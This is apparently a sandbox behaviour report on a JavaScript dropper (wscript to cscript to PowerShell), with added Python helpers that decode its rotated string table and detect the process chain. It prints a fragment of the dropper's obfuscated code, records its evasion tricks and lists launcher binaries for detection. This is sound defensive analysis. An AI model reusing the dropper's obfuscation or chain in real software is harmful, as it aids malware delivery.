Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: USERDOMAIN%\\%|iteWr|etFileG|RunEx|ript.ShellWSc|tingsset|leStartWhenAvailab|rectoryWorkingDi|floor|pSlee|LogonTriggerId|twscrip";FRWMh = HQgORQZ.split("|");XYNcro = FRWMh[RuamKJ];for (var akvCX = 0;
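The AMSI capture above shows the dropper's string table: a single `|`-delimited literal that is split once and then indexed (`FRWMh[RuamKJ]`). Every readable fragment is a cyclic rotation of a WSH, FileSystemObject or Task Scheduler object-model name (`ript.ShellWSc` is `WScript.Shell`, `leStartWhenAvailab` is `StartWhenAvailable`, `rectoryWorkingDi` is `WorkingDirectory`), which fits the "Creates COM task schedule object" signature. The helper below is an added example, not code from the sample or the report. It assumes, from that pattern, that the `for` loop following the split un-rotates each entry at run time, and recovers the names statically by trying every rotation against a constructed allowlist instead of executing the script; the allowlist and the rotation hypothesis are the author's assumptions. The capture is cut off on the left, so the first fragment may be incomplete, and a fragment that no allowlisted name explains is reported as unresolved rather than guessed.

```python
"""Recover the identifiers behind the '|'-delimited lookup table that AMSI
captured from wscript.exe (the Anti Malware Scan Interface entry above).

Added analysis helper, not code from the sample or from the report.
Assumption, not stated in the report but consistent with every readable
fragment: each table entry is a cyclic rotation of the real identifier, and
the loop that follows split("|") in the capture un-rotates entries at run
time.  Rather than run the script, try every rotation of each fragment
against an allowlist of names a WSH / Task Scheduler dropper would use.
"""

# The table exactly as captured.  In the JScript source a "\\" is a single
# backslash at run time, so a raw string with one backslash reproduces it.
# The capture is cut off on the left, so the first fragment may be partial.
AMSI_TABLE = (r"USERDOMAIN%\%|iteWr|etFileG|RunEx|ript.ShellWSc|tingsset"
              r"|leStartWhenAvailab|rectoryWorkingDi|floor|pSlee"
              r"|LogonTriggerId|twscrip")

# Constructed allowlist (an assumption): WSH, FileSystemObject, Task
# Scheduler object-model and JScript names.  Extend it when a fragment
# stays unresolved; never hard-code a guess for an unresolved fragment.
KNOWN_NAMES = [
    "%USERDOMAIN%\\", "Write", "GetFile", "WScript.Shell", "settings",
    "StartWhenAvailable", "WorkingDirectory", "floor", "Sleep",
    "LogonTriggerId", "wscript", "Run", "Exec", "CreateObject",
]


def rotations(s):
    """Yield (k, s rotated left by k) for every k, starting with k = 0."""
    for k in range(len(s)):
        yield k, s[k:] + s[:k]


def unrotate(fragment, known=KNOWN_NAMES):
    """Return (name, shift) where fragment == name[shift:] + name[:shift]
    for some name in the allowlist, or (None, None) if no rotation matches."""
    known_set = set(known)
    for k, candidate in rotations(fragment):
        if candidate in known_set:
            # Rotating the fragment left by k recovered the name, so the
            # name was rotated left by len - k to produce the fragment.
            return candidate, (len(fragment) - k) % len(fragment)
    return None, None


def decode_table(table, known=KNOWN_NAMES):
    """Split the table as the script does and map fragment -> identifier
    (None where no allowlisted name fits)."""
    return {frag: unrotate(frag, known)[0] for frag in table.split("|")}


def unresolved(table, known=KNOWN_NAMES):
    """Fragments that no allowlisted identifier explains."""
    return [f for f, name in decode_table(table, known).items() if name is None]


if __name__ == "__main__":
    for frag, name in decode_table(AMSI_TABLE).items():
        print(f"{frag:22} -> {name if name else '?'}")
    print("unresolved:", unresolved(AMSI_TABLE))
```

Run as-is, the only fragment left unresolved is `RunEx`; whether it is a rotated `ExRun`, a partial token or something else cannot be decided from the capture, so it stays a question mark until the full script is available.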
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (repeated 2 times)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (repeated 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5994
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3810
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep count: 4625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep count: 5238 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268 Thread sleep count: 5994 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268 Thread sleep count: 3810 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (repeated 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (repeated 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS" (repeated 2 times)
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (repeated 2 times)
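The two process-creation entries above are the chain the Sigma rules in the overview fire on: wscript.exe launches cscript.exe on a file given only by its NTFS 8.3 short name ("BALANC~1.JS"), and that cscript.exe instance spawns powershell.exe. The short name hides the long file name, so the pivot on a live host is to resolve it in its directory (`dir /x`) before searching for it elsewhere. The script below is an added detection example, not part of the report: it runs the three checks (script file executed via wscript/cscript, short name in a command line, script host spawning a launcher) over Sysmon-style process events. The event records are constructed to mirror this report's chain; their PIDs and the wscript.exe command line are hypothetical, and the notepad.exe event is a benign control.

```python
"""Flag the wscript.exe -> cscript.exe "BALANC~1.JS" -> powershell.exe chain
that the sandbox logged, in process-creation telemetry.

Added detection example, not part of the report.  The field layout is
Sysmon-style (ParentImage, Image, CommandLine); the event records at the
bottom are constructed to mirror the chain in this report, and the PIDs and
the wscript.exe command line are hypothetical.
"""

import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")
# Children that turn a script host into a dropper / second-stage launcher.
DROPPER_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                    "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# An NTFS 8.3 short name: at most six characters, a tilde, a number and an
# optional extension of at most three characters, e.g. BALANC~1.JS, PROGRA~1.
SHORT_NAME = re.compile(r"(?<![\w.-])[\w$-]{1,6}~\d+(?:\.[\w$-]{1,3})?(?!\w)",
                        re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def argv(command_line):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare
            for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', command_line)]


def analyze(events):
    """Return (pid, rule, detail) findings; one event may hit several rules."""
    findings = []
    for ev in events:
        img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
        # Sigma: WSF/JSE/JS/VBA/VBE file execution via cscript/wscript
        if img in SCRIPT_HOSTS and any(a.lower().endswith(SCRIPT_EXTS) for a in argv(cl)[1:]):
            findings.append((ev.pid, "script_file_via_wscript_cscript", cl))
        # Sigma: NTFS short name in command line (hides the real file name)
        m = SHORT_NAME.search(cl)
        if m:
            findings.append((ev.pid, "ntfs_short_name_in_cmdline", m.group(0)))
        # Sigma: WScript or CScript dropper (script host spawns a launcher)
        if parent in SCRIPT_HOSTS and img in DROPPER_CHILDREN:
            findings.append((ev.pid, "wscript_cscript_dropper", f"{parent} -> {img}"))
    return findings


# Constructed events mirroring this report's chain (PIDs and the wscript
# command line are hypothetical); the notepad.exe event is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(1001, r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js"'),
    ProcEvent(1002, r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cscript.exe",
              r'"C:\Windows\System32\cscript.exe" "BALANC~1.JS"'),
    ProcEvent(1003, r"C:\Windows\System32\cscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell"),
    ProcEvent(1004, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'),
]

if __name__ == "__main__":
    for pid, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

The short-name check is deliberately broad (any `name~N` token), so expect benign hits from installers and legacy tools that pass `PROGRA~1` paths; the script-host parentage check is the higher-confidence signal, and in this report both fire on the same chain.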
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 5 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (repeated 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (repeated 5 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid